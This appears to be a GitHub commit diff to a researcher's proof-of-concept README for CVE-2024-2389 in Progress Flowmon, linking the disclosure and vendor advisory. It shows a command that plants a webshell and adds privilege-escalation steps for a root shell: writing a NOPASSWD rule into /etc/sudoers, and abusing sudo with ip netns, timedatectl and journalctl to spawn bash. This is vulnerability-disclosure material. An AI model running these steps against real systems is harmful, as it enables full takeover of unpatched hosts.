File tree Expand file tree Collapse file tree 2 files changed +25
-3
lines changed Expand file tree Collapse file tree 2 files changed +25
-3
lines changed Original file line number Diff line number Diff line change 55** Versions Affected:** Tested on v12.03.02
66** Version Fixed:** 12.3.5/11.1.14
77** Researcher:** Dave Yesland (https://x.com/daveysec )
8- ** Disclosure Link:** https://rhinosecuritylabs.com/
8+ ** Disclosure Link:** https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/
99** NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389
1010** Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability
1111
@@ -21,5 +21,28 @@ To write a simple webshell:
2121` python3 CVE-2024-2389 --web-shell TARGET `
2222Then visit TARGET/rce.php
2323
24+ A root shell can be obtained through several methods:
25+ ```
26+ cp /var/www/shtml/index.php /tmp/index.php.bak;
27+ echo '<?php system("echo \"ADMINS ALL=(ALL) NOPASSWD: ALL\" >> /etc/sudoers"); ?>' > /var/www/shtml/index.php;
28+ sudo /usr/bin/php /var/www/shtml/index.php Cli\:AddNewSource s;
29+ cp /tmp/index.php.bak /var/www/shtml/index.php;
30+
31+ # ip command:
32+ sudo ip netns add foo
33+ sudo ip netns exec foo /bin/ln -s /proc/1/ns/net /var/run/netns/bar
34+ sudo ip netns exec bar /bin/bash
35+ sudo ip netns delete foo
36+ sudo ip netns delete bar
37+
38+ # Abusing the timedatectl command:
39+ sudo timedatectl list-timezones
40+ !/bin/bash
41+
42+ #Abusing journalctl
43+ sudo journalctl
44+ !/bin/bash
45+ ```
46+
2447### Screenshot
25- ![ Alt-text that shows up on hover ] ( poc_image.png )
48+ ![ poc_image ] ( https://github.com/RhinoSecurityLabs/CVEs/assets/41924355/56e95c42-3541-4768-862d-7d272db6ee8f )
Load Diff This file was deleted.
You can’t perform that action at this time.
0 commit comments